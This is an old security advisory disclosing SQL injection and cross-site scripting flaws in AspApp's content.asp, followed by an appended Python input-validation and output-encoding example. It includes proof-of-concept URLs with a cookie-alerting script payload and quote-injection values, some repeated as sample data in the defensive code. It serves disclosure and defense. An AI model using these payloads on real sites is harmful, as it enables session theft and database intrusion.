
AspApp.txt
Posted Mar 29, 2005
Authored by Diabolic Crab | Site hackerscenter.com

Multiple SQL injection and cross site scripting vulnerabilities have been discovered in AspApp. Sample exploitation provided.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | 03e90c2cb4195bc7bc382495197baedd3e0d909a18bcfb755d1062bb38afca07

Dcrab's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity: Medium
Title: Multiple SQL injection and XSS vulnerabilities in AspApp.
Date: March 30, 2005
Vendor: AspApp
Vendor site: http://www.localhost

Summary:
There are multiple SQL injection and XSS vulnerabilities in AspApp.

Proof of Concept Exploits:

http://localhost/content.asp?CatId=109&ContentType=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/content.asp?CatId='SQL_ERROR&ContentType=Company
Sql error
Microsoft VBScript runtime error '800a000d'

Type mismatch: 'cLng'

C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line 341


http://localhost/content.asp?ContentId='SQL_ERROR
Sql error
Microsoft VBScript runtime error '800a000d'

Type mismatch: 'cLng'

C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line 341


http://localhost/content.asp?contenttype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

Possible fix: The usage of htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the MySQL database, or before echoing data on the screen, would solve these problems.

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon to come out book on Secure coding with php.
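
Added example, not part of the original advisory and not AspApp's code: a Python illustration of the input validation and output encoding the "Possible fix" paragraph calls for, applied to the CatId, ContentId and ContentType parameters of content.asp. The function names and allowlist patterns are assumptions, and the sample URLs are constructed in the shape of the advisory's localhost requests; the same check can be run over web server logs to flag such requests.

```python
from urllib.parse import urlsplit, parse_qs
import html
import re

# Parameters the advisory's requests touch. Classic ASP treats query
# parameter names case-insensitively, so names are compared in lower case.
NUMERIC_PARAMS = {"catid", "contentid"}
TEXT_PARAMS = {"contenttype"}
INT_ALLOWED = re.compile(r"[0-9]{1,9}")              # assumed id format
TEXT_ALLOWED = re.compile(r"[A-Za-z0-9 _-]{1,64}")   # assumed allowlist


def check_content_request(url):
    """Return a list of (param, reason) findings for one content.asp request."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/content.asp"):
        return []
    findings = []
    # parse_qs percent-decodes values, so %22%3E is inspected as '">'.
    query = parse_qs(parts.query, keep_blank_values=True)
    for name, values in query.items():
        key = name.lower()
        for value in values:
            if key in NUMERIC_PARAMS and not INT_ALLOWED.fullmatch(value):
                findings.append((name, "non-numeric id"))
            elif key in TEXT_PARAMS and not TEXT_ALLOWED.fullmatch(value):
                findings.append((name, "markup or unexpected characters"))
    return findings


def render_content_type(value):
    """Output encoding: the form in which ContentType is safe to echo in HTML."""
    return html.escape(value, quote=True)


# Constructed sample requests.
SAMPLES = [
    "http://localhost/content.asp?CatId=109&ContentType=Company",
    "http://localhost/content.asp?CatId='SQL_ERROR&ContentType=Company",
    "http://localhost/content.asp?contenttype=%22%3E%3Cscript%3E"
    "alert(document.cookie)%3C/script%3E",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(check_content_request(url) or "ok", url)
```

Rejecting the request when findings are returned, binding the validated ids as typed query parameters, and encoding ContentType on output covers both classes of issue the advisory lists.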
